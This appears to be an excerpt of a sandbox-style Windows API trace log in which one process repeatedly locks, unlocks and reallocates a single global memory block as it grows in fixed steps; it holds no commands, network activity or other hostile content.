[0117.711] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.711] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.711] GlobalUnlock (hMem=0x62000c) returned 0
[0117.711] GlobalReAlloc (hMem=0x62000c, dwBytes=0x10000, uFlags=0x2) returned 0x62000c
[0117.711] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.712] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.712] GlobalUnlock (hMem=0x62000c) returned 0
[0117.712] GlobalReAlloc (hMem=0x62000c, dwBytes=0x12000, uFlags=0x2) returned 0x62000c
[0117.712] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.713] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.713] GlobalUnlock (hMem=0x62000c) returned 0
[0117.713] GlobalReAlloc (hMem=0x62000c, dwBytes=0x14000, uFlags=0x2) returned 0x62000c
[0117.713] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.714] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.714] GlobalUnlock (hMem=0x62000c) returned 0
[0117.714] GlobalReAlloc (hMem=0x62000c, dwBytes=0x16000, uFlags=0x2) returned 0x62000c
[0117.714] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.714] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.714] GlobalUnlock (hMem=0x62000c) returned 0
[0117.714] GlobalReAlloc (hMem=0x62000c, dwBytes=0x18000, uFlags=0x2) returned 0x62000c
[0117.714] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.715] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.715] GlobalUnlock (hMem=0x62000c) returned 0
[0117.715] GlobalReAlloc (hMem=0x62000c, dwBytes=0x1a000, uFlags=0x2) returned 0x62000c
[0117.715] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.716] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.716] GlobalUnlock (hMem=0x62000c) returned 0
[0117.716] GlobalReAlloc (hMem=0x62000c, dwBytes=0x1c000, uFlags=0x2) returned 0x62000c
[0117.716] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.717] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.717] GlobalUnlock (hMem=0x62000c) returned 0
[0117.717] GlobalReAlloc (hMem=0x62000c, dwBytes=0x1e000, uFlags=0x2) returned 0x62000c
[0117.717] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.717] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.717] GlobalUnlock (hMem=0x62000c) returned 0
[0117.717] GlobalReAlloc (hMem=0x62000c, dwBytes=0x20000, uFlags=0x2) returned 0x62000c
[0117.717] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.718] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.718] GlobalUnlock (hMem=0x62000c) returned 0
[0117.718] GlobalReAlloc (hMem=0x62000c, dwBytes=0x22000, uFlags=0x2) returned 0x62000c
[0117.720] GlobalLock (hMem=0x62000c) returned 0x6d6820
[0117.721] GlobalHandle (pMem=0x6d6820) returned 0x62000c
[0117.721] GlobalUnlock (hMem=0x62000c) returned 0
[0117.721] GlobalReAlloc (hMem=0x62000c, dwBytes=0x24000, uFlags=0x2) returned 0x62000c
[0117.721] GlobalLock (hMem=0x62000c) returned 0x6d6820
[0117.721] GlobalHandle (pMem=0x6d6820) returned 0x62000c
[0117.721] GlobalUnlock (hMem=0x62000c) returned 0
[0117.721] GlobalReAlloc (hMem=0x62000c, dwBytes=0x26000, uFlags=0x2) returned 0x62000c
[0117.723] GlobalLock (hMem=0x62000c) returned 0x6fa830
[0117.724] GlobalHandle (pMem=0x6fa830) returned 0x62000c
[0117.724] GlobalUnlock (hMem=0x62000c) returned 0
[0117.724] GlobalReAlloc (hMem=0x62000c, dwBytes=0x28000, uFlags=0x2) returned 0x62000c
[0117.724] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.725] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.725] GlobalUnlock (hMem=0x62000c) returned 0
[0117.725] GlobalReAlloc (hMem=0x62000c, dwBytes=0x2a000, uFlags=0x2) returned 0x62000c
[0117.725] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.726] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.726] GlobalUnlock (hMem=0x62000c) returned 0
[0117.726] GlobalReAlloc (hMem=0x62000c, dwBytes=0x2c000, uFlags=0x2) returned 0x62000c
[0117.726] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.727] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.727] GlobalUnlock (hMem=0x62000c) returned 0
[0117.727] GlobalReAlloc (hMem=0x62000c, dwBytes=0x2e000, uFlags=0x2) returned 0x62000c
[0117.727] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.727] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.727] GlobalUnlock (hMem=0x62000c) returned 0
[0117.727] GlobalReAlloc (hMem=0x62000c, dwBytes=0x30000, uFlags=0x2) returned 0x62000c
[0117.728] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.728] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.728] GlobalUnlock (hMem=0x62000c) returned 0
[0117.728] GlobalReAlloc (hMem=0x62000c, dwBytes=0x32000, uFlags=0x2) returned 0x62000c
[0117.728] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.729] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.729] GlobalUnlock (hMem=0x62000c) returned 0
[0117.729] GlobalReAlloc (hMem=0x62000c, dwBytes=0x34000, uFlags=0x2) returned 0x62000c
[0117.729] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.730] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.730] GlobalUnlock (hMem=0x62000c) returned 0
[0117.730] GlobalReAlloc (hMem=0x62000c, dwBytes=0x36000, uFlags=0x2) returned 0x62000c
[0117.730] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.730] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.730] GlobalUnlock (hMem=0x62000c) returned 0
[0117.730] GlobalReAlloc (hMem=0x62000c, dwBytes=0x38000, uFlags=0x2) returned 0x62000c
[0117.730] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.731] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.731] GlobalUnlock (hMem=0x62000c) returned 0
[0117.731] GlobalReAlloc (hMem=0x62000c, dwBytes=0x3a000, uFlags=0x2) returned 0x62000c
[0117.731] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.732] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.732] GlobalUnlock (hMem=0x62000c) returned 0
[0117.732] GlobalReAlloc (hMem=0x62000c, dwBytes=0x3c000, uFlags=0x2) returned 0x62000c
[0117.732] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.733] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.733] GlobalUnlock (hMem=0x62000c) returned 0
[0117.733] GlobalReAlloc (hMem=0x62000c, dwBytes=0x3e000, uFlags=0x2) returned 0x62000c
[0117.733] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.733] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.733] GlobalUnlock (hMem=0x62000c) returned 0
[0117.733] GlobalReAlloc (hMem=0x62000c, dwBytes=0x40000, uFlags=0x2) returned 0x62000c
[0117.733] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.734] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.734] GlobalUnlock (hMem=0x62000c) returned 0
[0117.734] GlobalReAlloc (hMem=0x62000c, dwBytes=0x42000, uFlags=0x2) returned 0x62000c
[0117.734] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.735] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.735] GlobalUnlock (hMem=0x62000c) returned 0
[0117.735] GlobalReAlloc (hMem=0x62000c, dwBytes=0x44000, uFlags=0x2) returned 0x62000c
[0117.735] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.736] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.736] GlobalUnlock (hMem=0x62000c) returned 0
[0117.736] GlobalReAlloc (hMem=0x62000c, dwBytes=0x46000, uFlags=0x2) returned 0x62000c
[0117.736] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.736] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.736] GlobalUnlock (hMem=0x62000c) returned 0
[0117.736] GlobalReAlloc (hMem=0x62000c, dwBytes=0x48000, uFlags=0x2) returned 0x62000c
[0117.736] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.737] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.737] GlobalUnlock (hMem=0x62000c) returned 0
[0117.737] GlobalReAlloc (hMem=0x62000c, dwBytes=0x4a000, uFlags=0x2) returned 0x62000c
[0117.737] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.738] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.738] GlobalUnlock (hMem=0x62000c) returned 0
[0117.738] GlobalReAlloc (hMem=0x62000c, dwBytes=0x4c000, uFlags=0x2) returned 0x62000c
[0117.738] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.739] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.739] GlobalUnlock (hMem=0x62000c) returned 0
[0117.739] GlobalReAlloc (hMem=0x62000c, dwBytes=0x4e000, uFlags=0x2) returned 0x62000c
[0117.739] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.740] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.740] GlobalUnlock (hMem=0x62000c) returned 0
[0117.740] GlobalReAlloc (hMem=0x62000c, dwBytes=0x50000, uFlags=0x2) returned 0x62000c
[0117.740] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.740] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.740] GlobalUnlock (hMem=0x62000c) returned 0
[0117.740] GlobalReAlloc (hMem=0x62000c, dwBytes=0x52000, uFlags=0x2) returned 0x62000c
[0117.740] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.741] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.741] GlobalUnlock (hMem=0x62000c) returned 0
[0117.741] GlobalReAlloc (hMem=0x62000c, dwBytes=0x54000, uFlags=0x2) returned 0x62000c
[0117.741] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.742] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.742] GlobalUnlock (hMem=0x62000c) returned 0
[0117.742] GlobalReAlloc (hMem=0x62000c, dwBytes=0x56000, uFlags=0x2) returned 0x62000c
[0117.789] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.790] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.790] GlobalUnlock (hMem=0x62000c) returned 0
[0117.790] GlobalReAlloc (hMem=0x62000c, dwBytes=0x58000, uFlags=0x2) returned 0x62000c
[0117.790] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.791] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.791] GlobalUnlock (hMem=0x62000c) returned 0
[0117.791] GlobalReAlloc (hMem=0x62000c, dwBytes=0x5a000, uFlags=0x2) returned 0x62000c
[0117.791] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.791] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.791] GlobalUnlock (hMem=0x62000c) returned 0
[0117.791] GlobalReAlloc (hMem=0x62000c, dwBytes=0x5c000, uFlags=0x2) returned 0x62000c
[0117.791] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.792] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.792] GlobalUnlock (hMem=0x62000c) returned 0
[0117.792] GlobalReAlloc (hMem=0x62000c, dwBytes=0x5e000, uFlags=0x2) returned 0x62000c
[0117.792] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.793] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.793] GlobalUnlock (hMem=0x62000c) returned 0
[0117.793] GlobalReAlloc (hMem=0x62000c, dwBytes=0x60000, uFlags=0x2) returned 0x62000c
[0117.793] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.793] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.793] GlobalUnlock (hMem=0x62000c) returned 0
[0117.793] GlobalReAlloc (hMem=0x62000c, dwBytes=0x62000, uFlags=0x2) returned 0x62000c
[0117.794] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.794] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.794] GlobalUnlock (hMem=0x62000c) returned 0
[0117.794] GlobalReAlloc (hMem=0x62000c, dwBytes=0x64000, uFlags=0x2) returned 0x62000c
[0117.794] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.795] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.795] GlobalUnlock (hMem=0x62000c) returned 0
[0117.795] GlobalReAlloc (hMem=0x62000c, dwBytes=0x66000, uFlags=0x2) returned 0x62000c
[0117.795] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.796] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.796] GlobalUnlock (hMem=0x62000c) returned 0
[0117.796] GlobalReAlloc (hMem=0x62000c, dwBytes=0x68000, uFlags=0x2) returned 0x62000c
[0117.796] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.796] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.796] GlobalUnlock (hMem=0x62000c) returned 0
[0117.796] GlobalReAlloc (hMem=0x62000c, dwBytes=0x6a000, uFlags=0x2) returned 0x62000c
[0117.796] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.797] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.797] GlobalUnlock (hMem=0x62000c) returned 0
[0117.797] GlobalReAlloc (hMem=0x62000c, dwBytes=0x6c000, uFlags=0x2) returned 0x62000c
[0117.802] GlobalLock (hMem=0x62000c) returned 0x720820
[0117.803] GlobalHandle (pMem=0x720820) returned 0x62000c
[0117.803] GlobalUnlock (hMem=0x62000c) returned 0
[0117.803] GlobalReAlloc (hMem=0x62000c, dwBytes=0x6e000, uFlags=0x2) returned 0x62000c
[0117.803] GlobalLock (hMem=0x62000c) returned 0x720820
[0117.804] GlobalHandle (pMem=0x720820) returned 0x62000c
[0117.804] GlobalUnlock (hMem=0x62000c) returned 0
[0117.804] GlobalReAlloc (hMem=0x62000c, dwBytes=0x70000, uFlags=0x2) returned 0x62000c
[0117.817] GlobalLock (hMem=0x62000c) returned 0x24d0048
[0117.818] GlobalHandle (pMem=0x24d0048) returned 0x62000c
[0117.818] GlobalUnlock (hMem=0x62000c) returned 0
[0117.818] GlobalReAlloc (hMem=0x62000c, dwBytes=0x72000, uFlags=0x2) returned 0x62000c
[0117.823] GlobalLock (hMem=0x62000c) returned 0x2540058
[0117.824] GlobalHandle (pMem=0x2540058) returned 0x62000c
[0117.824] GlobalUnlock (hMem=0x62000c) returned 0
[0117.824] GlobalReAlloc (hMem=0x62000c, dwBytes=0x74000, uFlags=0x2) returned 0x62000c
[0117.824] GlobalLock (hMem=0x62000c) returned 0x2540058
[0117.825] GlobalHandle (pMem=0x2540058) returned 0x62000c
[0117.825] GlobalUnlock (hMem=0x62000c) returned 0
[0117.825] GlobalReAlloc (hMem=0x62000c, dwBytes=0x76000, uFlags=0x2) returned 0x62000c
[0117.886] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.887] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.887] GlobalUnlock (hMem=0x62000c) returned 0
[0117.887] GlobalReAlloc (hMem=0x62000c, dwBytes=0x78000, uFlags=0x2) returned 0x62000c
[0117.893] GlobalLock (hMem=0x62000c) returned 0x24d0048
[0117.894] GlobalHandle (pMem=0x24d0048) returned 0x62000c
[0117.894] GlobalUnlock (hMem=0x62000c) returned 0
[0117.894] GlobalReAlloc (hMem=0x62000c, dwBytes=0x7a000, uFlags=0x2) returned 0x62000c
[0117.900] GlobalLock (hMem=0x62000c) returned 0x2548058
[0117.901] GlobalHandle (pMem=0x2548058) returned 0x62000c
[0117.901] GlobalUnlock (hMem=0x62000c) returned 0
[0117.901] GlobalReAlloc (hMem=0x62000c, dwBytes=0x7c000, uFlags=0x2) returned 0x62000c
[0117.901] GlobalLock (hMem=0x62000c) returned 0x2548058
[0117.902] GlobalHandle (pMem=0x2548058) returned 0x62000c
[0117.902] GlobalUnlock (hMem=0x62000c) returned 0
[0117.902] GlobalReAlloc (hMem=0x62000c, dwBytes=0x7e000, uFlags=0x2) returned 0x62000c
[0117.917] GlobalLock (hMem=0x62000c) returned 0x25d0048
[0117.918] GlobalHandle (pMem=0x25d0048) returned 0x62000c
[0117.918] GlobalUnlock (hMem=0x62000c) returned 0
[0117.918] GlobalReAlloc (hMem=0x62000c, dwBytes=0x80000, uFlags=0x2) returned 0x62000c
[0117.982] GlobalLock (hMem=0x62000c) returned 0x1480020
[0117.983] GlobalHandle (pMem=0x1480020) returned 0x62000c
[0117.983] GlobalUnlock (hMem=0x62000c) returned 0
[0117.983] GlobalReAlloc (hMem=0x62000c, dwBytes=0x82000, uFlags=0x2) returned 0x62000c
[0118.001] GlobalLock (hMem=0x62000c) returned 0x1570020
[0118.001] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0118.002] GlobalUnlock (hMem=0x62000c) returned 0
[0118.002] GlobalReAlloc (hMem=0x62000c, dwBytes=0x84000, uFlags=0x2) returned 0x62000c
[0118.012] GlobalLock (hMem=0x62000c) returned 0x1480020
[0118.013] GlobalHandle (pMem=0x1480020) returned 0x62000c
[0118.013] GlobalUnlock (hMem=0x62000c) returned 0
[0118.013] GlobalReAlloc (hMem=0x62000c, dwBytes=0x86000, uFlags=0x2) returned 0x62000c
[0118.070] GlobalLock (hMem=0x62000c) returned 0x1570020
[0118.071] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0118.071] GlobalUnlock (hMem=0x62000c) returned 0
[0118.071] GlobalReAlloc (hMem=0x62000c, dwBytes=0x88000, uFlags=0x2) returned 0x62000c
[0118.082] GlobalLock (hMem=0x62000c) returned 0x1480020
[0118.083] GlobalHandle (pMem=0x1480020) returned 0x62000c
[0118.083] GlobalUnlock (hMem=0x62000c) returned 0
[0118.083] GlobalReAlloc (hMem=0x62000c, dwBytes=0x8a000, uFlags=0x2) returned 0x62000c
[0118.094] GlobalLock (hMem=0x62000c) returned 0x1570020
[0118.095] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0118.095] GlobalUnlock (hMem=0x62000c) returned 0
[0118.095] GlobalReAlloc (hMem=0x62000c, dwBytes=0x8c000, uFlags=0x2) returned 0x62000c
[0118.106] GlobalLock (hMem=0x62000c) returned 0x1480020
[0118.107] GlobalHandle (pMem=0x1480020) returned 0x62000c
[0118.107] GlobalUnlock (hMem=0x62000c) returned 0
[0118.107] GlobalReAlloc (hMem=0x62000c, dwBytes=0x8e000, uFlags=0x2) returned 0x62000c
[0118.166] GlobalLock (hMem=0x62000c) returned 0x1570020
[0118.167] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0118.167] GlobalUnlock (hMem=0x62000c) returned 0
[0118.167] GlobalReAlloc (hMem=0x62000c, dwBytes=0x90000, uFlags=0x2) returned 0x62000c
[0118.178] GlobalLock (hMem=0x62000c) returned 0x1480020
[0118.179] GlobalHandle (pMem=0x1480020) returned 0x62000c
[0118.179] GlobalUnlock (hMem=0x62000c) returned 0
[0118.179] GlobalReAlloc (hMem=0x62000c, dwBytes=0x92000, uFlags=0x2) returned 0x62000c
[0118.192] GlobalLock (hMem=0x62000c) returned 0x1570020
[0118.193] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0118.193] GlobalUnlock (hMem=0x62000c) returned 0
[0118.193] GlobalReAlloc (hMem=0x62000c, dwBytes=0x94000, uFlags=0x2) returned 0x62000c
[0118.205] GlobalLock (hMem=0x62000c) returned 0x1480020
[0118.206] GlobalHandle (pMem=0x1480020) returned 0x62000c
[0118.206] GlobalUnlock (hMem=0x62000c) returned 0
[0118.206] GlobalReAlloc (hMem=0x62000c, dwBytes=0x96000, uFlags=0x2) returned 0x62000c
[0118.265] GlobalLock (hMem=0x62000c) returned 0x1570020
[0118.266] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0118.266] GlobalUnlock (hMem=0x62000c) returned 0
[0118.266] GlobalReAlloc (hMem=0x62000c, dwBytes=0x98000, uFlags=0x2) returned 0x62000c
[0118.278] GlobalLock (hMem=0x62000c) returned 0x1480020
[0118.279] GlobalHandle (pMem=0x1480020) returned 0x62000c
[0118.279] GlobalUnlock (hMem=0x62000c) returned 0
[0118.279] GlobalReAlloc (hMem=0x62000c, dwBytes=0x9a000, uFlags=0x2) returned 0x62000c
[0118.291] GlobalLock (hMem=0x62000c) returned 0x1570020
[0118.292] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0118.292] GlobalUnlock (hMem=0x62000c) returned 0
[0118.292] GlobalReAlloc (hMem=0x62000c, dwBytes=0x9c000, uFlags=0x2) returned 0x62000c
[0118.352] GlobalLock (hMem=0x62000c) returned 0x1480020
[0118.353] GlobalHandle (pMem=0x1480020) returned 0x62000c
[0118.353] GlobalUnlock (hMem=0x62000c) returned 0
[0118.353] GlobalReAlloc (hMem=0x62000c, dwBytes=0x9e000, uFlags=0x2) returned 0x62000c
[0118.366] GlobalLock (hMem=0x62000c) returned 0x1570020
[0118.367] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0118.367] GlobalUnlock (hMem=0x62000c) returned 0
[0118.367] GlobalReAlloc (hMem=0x62000c, dwBytes=0xa0000, uFlags=0x2) returned 0x62000c
[0118.380] GlobalLock (hMem=0x62000c) returned 0x1480020
[0118.381] GlobalHandle (pMem=0x1480020) returned 0x62000c
[0118.381] GlobalUnlock (hMem=0x62000c) returned 0
[0118.381] GlobalReAlloc (hMem=0x62000c, dwBytes=0xa2000, uFlags=0x2) returned 0x62000c
[0118.395] GlobalLock (hMem=0x62000c) returned 0x1570020
[0118.395] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0118.395] GlobalUnlock (hMem=0x62000c) returned 0
[0118.396] GlobalReAlloc (hMem=0x62000c, dwBytes=0xa4000, uFlags=0x2) returned 0x62000c
[0118.455] GlobalLock (hMem=0x62000c) returned 0x1480020
[0118.456] GlobalHandle (pMem=0x1480020) returned 0x62000c
[0118.456] GlobalUnlock (hMem=0x62000c) returned 0
[0118.456] GlobalReAlloc (hMem=0x62000c, dwBytes=0xa6000, uFlags=0x2) returned 0x62000c
[0118.471] GlobalLock (hMem=0x62000c) returned 0x1570020
[0118.471] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0118.471] GlobalUnlock (hMem=0x62000c) returned 0
[0118.471] GlobalReAlloc (hMem=0x62000c, dwBytes=0xa8000, uFlags=0x2) returned 0x62000c
[0118.486] GlobalLock (hMem=0x62000c) returned 0x1480020
[0118.487] GlobalHandle (pMem=0x1480020) returned 0x62000c
[0118.487] GlobalUnlock (hMem=0x62000c) returned 0
[0118.487] GlobalReAlloc (hMem=0x62000c, dwBytes=0xaa000, uFlags=0x2) returned 0x62000c
[0118.547] GlobalLock (hMem=0x62000c) returned 0x1570020
[0118.548] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0118.548] GlobalUnlock (hMem=0x62000c) returned 0
[0118.548] GlobalReAlloc (hMem=0x62000c, dwBytes=0xac000, uFlags=0x2) returned 0x62000c
[0118.563] GlobalLock (hMem=0x62000c) returned 0x1480020
[0118.564] GlobalHandle (pMem=0x1480020) returned 0x62000c
[0118.564] GlobalUnlock (hMem=0x62000c) returned 0
[0118.564] GlobalReAlloc (hMem=0x62000c, dwBytes=0xae000, uFlags=0x2) returned 0x62000c
[0118.578] GlobalLock (hMem=0x62000c) returned 0x1570020
[0118.579] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0118.579] GlobalUnlock (hMem=0x62000c) returned 0
[0118.579] GlobalReAlloc (hMem=0x62000c, dwBytes=0xb0000, uFlags=0x2) returned 0x62000c
[0118.641] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0118.642] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0118.642] GlobalUnlock (hMem=0x62000c) returned 0
[0118.642] GlobalReAlloc (hMem=0x62000c, dwBytes=0xb2000, uFlags=0x2) returned 0x62000c
[0118.658] GlobalLock (hMem=0x62000c) returned 0x1570020
[0118.658] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0118.658] GlobalUnlock (hMem=0x62000c) returned 0
[0118.658] GlobalReAlloc (hMem=0x62000c, dwBytes=0xb4000, uFlags=0x2) returned 0x62000c
[0118.675] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0118.675] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0118.675] GlobalUnlock (hMem=0x62000c) returned 0
[0118.675] GlobalReAlloc (hMem=0x62000c, dwBytes=0xb6000, uFlags=0x2) returned 0x62000c
[0118.738] GlobalLock (hMem=0x62000c) returned 0x1570020
[0118.739] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0118.739] GlobalUnlock (hMem=0x62000c) returned 0
[0118.739] GlobalReAlloc (hMem=0x62000c, dwBytes=0xb8000, uFlags=0x2) returned 0x62000c
[0118.757] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0118.758] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0118.758] GlobalUnlock (hMem=0x62000c) returned 0
[0118.758] GlobalReAlloc (hMem=0x62000c, dwBytes=0xba000, uFlags=0x2) returned 0x62000c
[0118.824] GlobalLock (hMem=0x62000c) returned 0x1570020
[0118.825] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0118.825] GlobalUnlock (hMem=0x62000c) returned 0
[0118.825] GlobalReAlloc (hMem=0x62000c, dwBytes=0xbc000, uFlags=0x2) returned 0x62000c
[0118.844] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0118.845] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0118.845] GlobalUnlock (hMem=0x62000c) returned 0
[0118.845] GlobalReAlloc (hMem=0x62000c, dwBytes=0xbe000, uFlags=0x2) returned 0x62000c
[0118.864] GlobalLock (hMem=0x62000c) returned 0x1570020
[0118.928] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0118.928] GlobalUnlock (hMem=0x62000c) returned 0
[0118.928] GlobalReAlloc (hMem=0x62000c, dwBytes=0xc0000, uFlags=0x2) returned 0x62000c
[0118.948] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0118.949] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0118.949] GlobalUnlock (hMem=0x62000c) returned 0
[0118.949] GlobalReAlloc (hMem=0x62000c, dwBytes=0xc2000, uFlags=0x2) returned 0x62000c
[0118.965] GlobalLock (hMem=0x62000c) returned 0x1570020
[0118.966] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0118.966] GlobalUnlock (hMem=0x62000c) returned 0
[0118.966] GlobalReAlloc (hMem=0x62000c, dwBytes=0xc4000, uFlags=0x2) returned 0x62000c
[0119.028] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0119.029] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0119.029] GlobalUnlock (hMem=0x62000c) returned 0
[0119.029] GlobalReAlloc (hMem=0x62000c, dwBytes=0xc6000, uFlags=0x2) returned 0x62000c
[0119.045] GlobalLock (hMem=0x62000c) returned 0x1570020
[0119.046] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0119.046] GlobalUnlock (hMem=0x62000c) returned 0
[0119.046] GlobalReAlloc (hMem=0x62000c, dwBytes=0xc8000, uFlags=0x2) returned 0x62000c
[0119.063] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0119.064] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0119.064] GlobalUnlock (hMem=0x62000c) returned 0
[0119.064] GlobalReAlloc (hMem=0x62000c, dwBytes=0xca000, uFlags=0x2) returned 0x62000c
[0119.128] GlobalLock (hMem=0x62000c) returned 0x1570020
[0119.129] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0119.129] GlobalUnlock (hMem=0x62000c) returned 0
[0119.129] GlobalReAlloc (hMem=0x62000c, dwBytes=0xcc000, uFlags=0x2) returned 0x62000c
[0119.147] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0119.148] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0119.148] GlobalUnlock (hMem=0x62000c) returned 0
[0119.148] GlobalReAlloc (hMem=0x62000c, dwBytes=0xce000, uFlags=0x2) returned 0x62000c
[0119.211] GlobalLock (hMem=0x62000c) returned 0x1570020
[0119.212] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0119.212] GlobalUnlock (hMem=0x62000c) returned 0
[0119.212] GlobalReAlloc (hMem=0x62000c, dwBytes=0xd0000, uFlags=0x2) returned 0x62000c
[0119.229] GlobalLock (hMem=0x62000c) returned 0x27d0020
[0119.230] GlobalHandle (pMem=0x27d0020) returned 0x62000c
[0119.230] GlobalUnlock (hMem=0x62000c) returned 0
[0119.230] GlobalReAlloc (hMem=0x62000c, dwBytes=0xd2000, uFlags=0x2) returned 0x62000c
[0119.247] GlobalLock (hMem=0x62000c) returned 0x1570020
[0119.248] GlobalHandle (pMem=0x1570020) returned 0x62000c
[0119.248] GlobalUnlock (hMem=0x62000c) returned 0
